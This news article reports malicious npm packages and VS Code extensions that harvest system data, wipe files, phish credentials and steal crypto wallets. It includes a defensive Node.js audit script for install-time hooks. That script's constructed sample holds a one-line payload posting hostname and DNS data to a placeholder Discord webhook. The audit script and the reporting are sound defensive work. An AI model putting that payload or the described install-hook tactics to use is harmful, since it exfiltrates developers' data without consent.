Over 70 Malicious npm and VS Code Packages Discovered Stealing Data and Cryptocurrency
By: Ravie Lakshmanan
Published: May 26, 2025
Categories: Cybersecurity, Cryptocurrency
In a recent cybersecurity alert, researchers have unveiled a growing threat within the software development community, identifying over 70 malicious packages on the npm (Node Package Manager) registry and Microsoft’s Visual Studio Code (VS Code) Marketplace that have been designed to steal sensitive data and cryptocurrency credentials.
npm Package Threat: Data Harvesting
According to a report by security researcher Kirill Boychenko from the software supply chain security firm Socket, approximately 60 malicious npm packages were discovered that collect data from the systems they are installed on. The packages, uploaded by three accounts that have since been deactivated, used install-time scripts that run automatically when the package is installed. Downloaded more than 3,000 times in total, the packages were engineered to capture details such as hostnames, IP addresses, DNS servers, and user directories.
“The script targets Windows, macOS, or Linux systems and employs sandbox evasion techniques, positioning every infected workstation or continuous integration node as a potential source of valuable reconnaissance,” Boychenko articulated in his findings.
The accounts behind these malicious packages were listed as:
- bbbb335656
- cdsfdfafd1232436437
- sdsds656565
The malicious code contained within these packages fingerprints any machine that installs them, aborting if it detects a virtualized environment linked to major cloud services such as Amazon and Google. The harvested data is sent to a Discord webhook, allowing attackers to map out the network and identify potential high-value targets for future campaigns.
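As an added defensive illustration (not code from the article, from Socket's report, or from the packages themselves), the following Node.js script audits a dependency's package.json for the install-time lifecycle hooks the harvesting packages relied on and flags hook scripts that reference the indicators described above (a Discord webhook, hostname or DNS-server lookups). The package name, script text, and indicator list are constructed for the example.

```javascript
// Added example: audit a package.json for install-time hooks and scan the
// hooked script for data-harvesting indicators. All sample data is constructed.
'use strict';

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators a defender might look for in install-time code (constructed list).
const INDICATORS = [
  { name: 'discord-webhook', re: /discord(?:app)?\.com\/api\/webhooks/i },
  { name: 'host-fingerprint', re: /os\.(?:hostname|networkInterfaces|userInfo)\(/ },
  { name: 'dns-lookup', re: /dns\.getServers\(/ },
  { name: 'cloud-metadata-check', re: /169\.254\.169\.254|metadata\.google\.internal/ },
];

// Return the install-time hooks a package.json object declares.
function installHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === 'string');
}

// Return the names of indicators found in a piece of script source.
function scanSource(source) {
  return INDICATORS.filter((i) => i.re.test(source)).map((i) => i.name);
}

// Audit one package: which hooks exist and which indicators each hook triggers.
// `readSource` maps a hook command to the script text it runs; it is injected so
// the example works offline against constructed data instead of reading disk.
function auditPackage(pkg, readSource) {
  const hooks = installHooks(pkg);
  const findings = {};
  for (const hook of hooks) {
    const cmd = pkg.scripts[hook];
    const hits = scanSource(cmd + '\n' + (readSource(cmd) || ''));
    if (hits.length) findings[hook] = hits;
  }
  return { name: pkg.name, hooks, findings, suspicious: Object.keys(findings).length > 0 };
}

// Constructed sample: a package whose postinstall hook runs a harvesting script.
const SAMPLE_PKG = { name: 'example-helper', version: '1.0.0', scripts: { postinstall: 'node setup.js' } };
const SAMPLE_FILES = {
  'node setup.js': "const os=require('os');const dns=require('dns');" +
    "fetch('https://discord.com/api/webhooks/000/placeholder',{method:'POST'," +
    "body:JSON.stringify({h:os.hostname(),d:dns.getServers()})});",
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(auditPackage(SAMPLE_PKG, (cmd) => SAMPLE_FILES[cmd]), null, 2));
}
```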
Destructive npm Packages
In addition to the data-stealing packages, Socket’s report also highlights the discovery of eight additional malicious npm packages masquerading as helper libraries for widely-used JavaScript frameworks, such as React and Vue.js. These packages, labeled as:
- vite-plugin-vue-extend
- quill-image-downloader
- js-hood
- js-bomb
- vue-plugin-bomb
- vite-plugin-bomb
- vite-plugin-bomb-extend
- vite-plugin-react-extend
Once installed, they deployed destructive payloads that corrupted data and erased critical files. Having amassed more than 6,200 downloads, some of these packages were programmed to execute automatically, recursively deleting files associated with prominent frameworks and corrupting fundamental JavaScript methods.
Notably, the package js-bomb was highlighted for not only deleting files but also executing system shutdowns at specified times. The threat actor behind this activity, known as xuxingfeng, has previously published five legitimate packages, illustrating a tactic of releasing both beneficial and harmful packages to enhance credibility and trust among developers.
Phishing Campaigns via Malicious Packages
Further complicating the situation, a novel phishing campaign was reported, linking traditional email phishing with JavaScript code embedded in a malicious npm package posing as an innocuous open-source library. This malicious maneuver, uncovered by Fortra researcher Israel Cerda, involved phishing emails that contained malicious .HTM files directing users to a counterfeit Office 365 login page designed for credential theft. The campaign’s sophistication included the use of AES encryption and npm packages delivered through a content delivery network, further obscuring the attackers’ malicious tactics.
VS Code Extensions Targeting Cryptocurrency
The threat extends beyond npm packages; Datadog Security Research identified several harmful extensions in the Visual Studio Code Marketplace engineered to steal cryptocurrency wallet credentials from users, particularly targeting Solidity developers. Known under the names:
- solaibot
- among-eth
- blankebesxstnion
These extensions masked malicious code within legitimate features, employing complex multilayered infection chains, which included obfuscated malware resistant to detection. They were purportedly designed for syntax scanning and vulnerability detection, but alongside these features, they sought to inject malware capable of pilfering Ethereum wallet information and executing commands that disable critical security measures such as Windows Defender.
With these extensions now removed from the marketplace, experts remain vigilant, suggesting that the threat actor, identified as MUT-9332, may continue to evolve tactics in future campaigns.
Conclusion
The findings underscore the ongoing threat posed by malicious packages and extensions within widely-used development environments. They highlight the necessity for developers to exercise heightened caution when sourcing libraries and extensions from public repositories and emphasize the importance of strong cybersecurity practices in the contemporary software supply chain landscape.
As attackers become increasingly sophisticated, adhering to robust security protocols and remaining aware of emerging threats is essential for safeguarding digital assets against exploitation.